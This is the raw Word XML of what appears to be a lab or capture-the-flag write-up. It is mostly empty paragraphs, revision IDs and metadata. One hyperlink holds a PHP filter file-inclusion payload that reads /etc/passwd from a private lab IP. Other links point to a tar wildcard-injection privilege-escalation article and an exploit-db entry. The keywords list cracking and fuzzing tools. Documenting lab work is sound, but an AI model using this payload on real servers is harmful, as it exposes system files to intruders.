    <w:p w14:paraId="21A8B29E" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="248E8488" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="49BAB2C9" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="63209201" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="2D57E57A" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="689CD5F3" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="28304AFF" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="799E1AC0" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="4855245F" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="7B77724E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1119A"/>
    <w:rsid w:val="00031042"/>
    <w:rsid w:val="00035878"/>
    <w:rsid w:val="0005480D"/>
    <w:rsid w:val="00086229"/>
    <w:rsid w:val="00096AC4"/>
    <w:rsid w:val="000B3561"/>
    <w:rsid w:val="000D3AD4"/>
    <w:rsid w:val="000E42A6"/>
    <w:rsid w:val="00121A4D"/>
    <w:rsid w:val="00127C92"/>
    <w:rsid w:val="001338AA"/>
    <w:rsid w:val="001350A6"/>
    <w:rsid w:val="001405C2"/>
    <w:rsid w:val="00140CBF"/>
    <w:rsid w:val="00161BCD"/>
    <w:rsid w:val="001669F8"/>
    <w:rsid w:val="00190D42"/>
    <w:rsid w:val="00197E2A"/>
    <w:rsid w:val="001D2129"/>
    <w:rsid w:val="001D7D5F"/>
    <w:rsid w:val="001E31BE"/>
    <w:rsid w:val="0021079B"/>
    <w:rsid w:val="002230C4"/>
    <w:rsid w:val="002275CC"/>
    <w:rsid w:val="002578F8"/>
    <w:rsid w:val="002B08FE"/>
    <w:rsid w:val="002C64A9"/>
    <w:rsid w:val="002D7AE0"/>
    <w:rsid w:val="003361A0"/>
    <w:rsid w:val="00353AB3"/>
    <w:rsid w:val="003C2E30"/>
    <w:rsid w:val="003C4EB1"/>
    <w:rsid w:val="003E16CE"/>
    <w:rsid w:val="003E1C86"/>
    <w:rsid w:val="003F3C55"/>
    <w:rsid w:val="00456432"/>
    <w:rsid w:val="00470C89"/>
    <w:rsid w:val="0047216A"/>
    <w:rsid w:val="00477F1B"/>
    <w:rsid w:val="004A248B"/>
    <w:rsid w:val="00541448"/>
    <w:rsid w:val="00584D8C"/>
    <w:rsid w:val="005A408B"/>
    <w:rsid w:val="005A48D5"/>
    <w:rsid w:val="005E2709"/>
    <w:rsid w:val="00626816"/>
    <w:rsid w:val="00633385"/>
    <w:rsid w:val="00654413"/>
    <w:rsid w:val="00677A4B"/>
    <w:rsid w:val="00687BFA"/>
    <w:rsid w:val="006B0561"/>
    <w:rsid w:val="006C6796"/>
    <w:rsid w:val="006D659D"/>
    <w:rsid w:val="006F1CAB"/>
    <w:rsid w:val="00726755"/>
    <w:rsid w:val="007307F9"/>
    <w:rsid w:val="007416F9"/>
    <w:rsid w:val="00765C2E"/>
    <w:rsid w:val="007701A4"/>
    <w:rsid w:val="00775F2D"/>
    <w:rsid w:val="00794A68"/>
    <w:rsid w:val="00796927"/>
    <w:rsid w:val="007979CD"/>
    <w:rsid w:val="007C5715"/>
    <w:rsid w:val="007F3741"/>
    <w:rsid w:val="00852711"/>
    <w:rsid w:val="008548CF"/>
    <w:rsid w:val="008A1172"/>
    <w:rsid w:val="008B0540"/>
    <w:rsid w:val="008D653E"/>
    <w:rsid w:val="008F3A30"/>
    <w:rsid w:val="00912E1D"/>
    <w:rsid w:val="00943E16"/>
    <w:rsid w:val="009855EC"/>
    <w:rsid w:val="00997714"/>
    <w:rsid w:val="009B1360"/>
    <w:rsid w:val="009C1B8F"/>
    <w:rsid w:val="009C4686"/>
    <w:rsid w:val="009D3D46"/>
    <w:rsid w:val="00A2553C"/>
    <w:rsid w:val="00A61DAC"/>
    <w:rsid w:val="00A73F22"/>
    <w:rsid w:val="00A86E18"/>
    <w:rsid w:val="00AA282B"/>
    <w:rsid w:val="00AB24EF"/>
    <w:rsid w:val="00AD110E"/>
    <w:rsid w:val="00AD6765"/>
    <w:rsid w:val="00AF3B80"/>
    <w:rsid w:val="00B44896"/>
    <w:rsid w:val="00B45350"/>
    <w:rsid w:val="00B61193"/>
    <w:rsid w:val="00B66F05"/>
    <w:rsid w:val="00B948E1"/>
    <w:rsid w:val="00BA067A"/>
    <w:rsid w:val="00BA3BDB"/>
    <w:rsid w:val="00BB7786"/>
    <w:rsid w:val="00BC7FF1"/>
    <w:rsid w:val="00BE312F"/>
    <w:rsid w:val="00BF243B"/>
    <w:rsid w:val="00C1059E"/>
    <w:rsid w:val="00C15B89"/>
    <w:rsid w:val="00C173B3"/>
    <w:rsid w:val="00C3012F"/>
    <w:rsid w:val="00C326C1"/>
    <w:rsid w:val="00C712DB"/>
    <w:rsid w:val="00C9484F"/>
    <w:rsid w:val="00C95B02"/>
    <w:rsid w:val="00CA3793"/>
    <w:rsid w:val="00CC306E"/>
    <w:rsid w:val="00D21621"/>
    <w:rsid w:val="00D27283"/>
    <w:rsid w:val="00D34FE4"/>
    <w:rsid w:val="00D63673"/>
    <w:rsid w:val="00D63D88"/>
    <w:rsid w:val="00D832EE"/>
    <w:rsid w:val="00DC0019"/>
    <w:rsid w:val="00DC0550"/>
    <w:rsid w:val="00DC22C6"/>
    <w:rsid w:val="00DC252E"/>
    <w:rsid w:val="00DE493A"/>
    <w:rsid w:val="00E552F3"/>
    <w:rsid w:val="00E61ADB"/>
    <w:rsid w:val="00E64FAA"/>
    <w:rsid w:val="00E66DFE"/>
    <w:rsid w:val="00EC6536"/>
    <w:rsid w:val="00ED3B35"/>
    <w:rsid w:val="00EE3B80"/>
    <w:rsid w:val="00EF00D5"/>
    <w:rsid w:val="00F0556E"/>
    <w:rsid w:val="00F0592C"/>
    <w:rsid w:val="00F10C70"/>
    <w:rsid w:val="00F1360E"/>
    <w:rsid w:val="00F3099C"/>
    <w:rsid w:val="00F36B52"/>
    <w:rsid w:val="00F953D6"/>
    <w:rsid w:val="00FA0EFB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0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77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B52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36B52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33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hyperlink" Target="http://192.168.56.152/index.php?referer=php://filter/convert.base64-encode/resource=/etc/passwd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systemweakness.com/privilege-escalation-using-wildcard-injection-tar-wildcard-injection-a57bc81df61c" TargetMode="External"/><Relationship Id="rId50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hyperlink" Target="https://www.exploit-db.com/exploits/44250?ref=infosecarticles.com" TargetMode="External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dirb; crackstation; php filter; john; wfuzz; curl; npm</cp:keywords>
  <dc:description/>
  <cp:lastModifiedBy>Michael Vasilio</cp:lastModifiedBy>
  <cp:revision>161</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-14T04:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-08T04:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>